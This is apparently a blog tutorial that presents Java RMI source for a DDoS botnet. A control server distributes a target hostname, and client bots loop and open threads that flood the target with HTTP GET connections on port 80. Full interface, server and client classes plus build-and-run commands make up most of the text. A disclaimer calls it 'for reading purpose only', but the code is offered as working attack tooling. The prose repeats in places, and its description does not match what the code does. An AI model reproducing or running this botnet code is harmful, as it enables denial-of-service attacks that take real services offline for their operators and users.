We often hear about the word DOS attack on a site, and few people often think like DOS only means Disk Operating System. But, here DOS is something big, and we use it to crash and operational site by consuming the quote of daily or monthly or yearly requests of a site.
Here I would like to share a basic program using RMI based bots that will be helpful for reading purpose only. My intention is not to develop hacker but just to give an idea of using RMI in JAVA.
First we have created an interface that will be concreted in it's implementation later. But, the main purpose behind creating this interface is just for RMI as the look up functionality of RMI needs an interface instead of complete implementation.
Till now we have almost done with our Server side code which we will be executing at our control panel machine from where we will be able to provide service to all those clients that will be waiting for our command. Actually here we have used RMI in reverse order as the clients are just acquiring the name of target machine from server. And once they got the name they start hitting it from their own machines.
As this code is just a day effort so probably need some further improvement too.
Now finally, we are at a stage to write the client side code that will be performing the actual task of sending fake requests to the client.
But in RMI we just need to compile in a bit different way. As it's related to client-server communication so we must need a stub that will be used as a communication bridge in between client and a server.
When we are already done with the coding. So, now we need to compile and test it.
javac DDOSServiceClient.java
javac DDOSServiceServer.java
rmic DDOSServiceServer
start rmiregistry
java DDOSServiceServer on server machine
java DDOSServiceClient on client machine.
That's it hope it will be helpful for many.
Here I would like to share a basic program using RMI based bots that will be helpful for reading purpose only. My intention is not to develop hacker but just to give an idea of using RMI in JAVA.
First we have created an interface that will be concreted in it's implementation later. But, the main purpose behind creating this interface is just for RMI as the look up functionality of RMI needs an interface instead of complete implementation.
Now this time is just to provide an implementation of that interface:import java.rmi.*;// DDOSService Interface// Interface for a RMI service that will actually attack on a target machinepublic interface DDOSService extends java.rmi.Remote{public String attack ( )throws RemoteException;}
import java.math.*;
import java.rmi.*;
import java.rmi.server.*;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.net.UnknownHostException;
//
// DDOSServiceServer
//
// Server for a RMI service that calculates powers
//
public class DDOSServiceServer extends UnicastRemoteObject implements Runnable, DDOSService
{ //Target Machine
final String TARGET = "wasif-pc";
static DDOSServiceServer _instance;
public DDOSServiceServer () throws RemoteException
{
super();
}
// Calculate the square of a number
public String attack( )
throws RemoteException
{
_instance = new DDOSServiceServer ();
//2 threads on each machine
for (int i = 0; i < 2; i++)
new Thread(_instance).start();
String attack;
attack = "Attacking:"+ TARGET ;
return attack;
}
public void run() {
//1000 HTTP Requests using each client you can send more requests too
for (int i = 1; i < 1000; i++) {
try {
Socket net = new Socket(TARGET, 80); // connects the Socket to the TARGET port 80.
sendRawLine("GET / HTTP/1.1", net); // Sends the GET / OutputStream
sendRawLine("Host: " + TARGET, net); // Sends Host: to the OutputStream
System.out.println("Attacking on Target "+TARGET+" with Connection #: " + i);
} catch (UnknownHostException e) {
System.out.println("DDoS.run: " + e);
} catch (IOException e) {
System.out.println("DDoS.run: " + e);
}
}
}
public static void main ( String args[] ) throws Exception
{
// Assign a security manager, in the event that dynamic
// classes are loaded
// Create an instance of our power service server ...
DDOSServiceServer svr = new DDOSServiceServer();
// ... and bind it with the RMI Registry
Naming.bind ("DDOSService", svr);
System.out.println ("Service bound....");
}
public static void sendRawLine(String text, Socket sock) {
try {
BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
out.write(text + " ");
out.flush();
} catch (IOException ex) {
ex.printStackTrace();
}
}
}
Till now we have almost done with our Server side code which we will be executing at our control panel machine from where we will be able to provide service to all those clients that will be waiting for our command. Actually here we have used RMI in reverse order as the clients are just acquiring the name of target machine from server. And once they got the name they start hitting it from their own machines.
As this code is just a day effort so probably need some further improvement too.
Now finally, we are at a stage to write the client side code that will be performing the actual task of sending fake requests to the client.
import java.rmi.*;
import java.rmi.Naming;
import java.io.*;
//
// DDOSServiceClient
//
public class DDOSServiceClient
{
String attack =""; public static void main(String args[]) throws Exception
{
DDOSServiceClient obj = new DDOSServiceClient() ;
while(true){
obj.attack ="";
try{
obj.go();
}
catch(java.rmi.ConnectException rc){
System.out.println("Connection Failure");
}
catch(java.net.ConnectException rc){
System.out.println("Net Failure");
} catch(java.rmi.NotBoundException je){
System.out.println("java.rmi.NotBoundException");
} System.out.println(obj.attack);
}
}
private static void go() throws Exception{
// Call registry for DDOSService
DDOSServiceClient obj = new DDOSServiceClient() ;
Thread.sleep(5000);
//A server IP that need to be replaced with this IP
DDOSService service = (DDOSService) Naming.lookup
("rmi://192.168.55.44/DDOSService");
DataInputStream din = new
DataInputStream (System.in);
//Calling remote Method
obj.attack = service.attack();
}
}
But in RMI we just need to compile in a bit different way. As it's related to client-server communication so we must need a stub that will be used as a communication bridge in between client and a server.
When we are already done with the coding. So, now we need to compile and test it.
javac DDOSServiceClient.java
javac DDOSServiceServer.java
rmic DDOSServiceServer
start rmiregistry
java DDOSServiceServer on server machine
java DDOSServiceClient on client machine.
That's it hope it will be helpful for many.
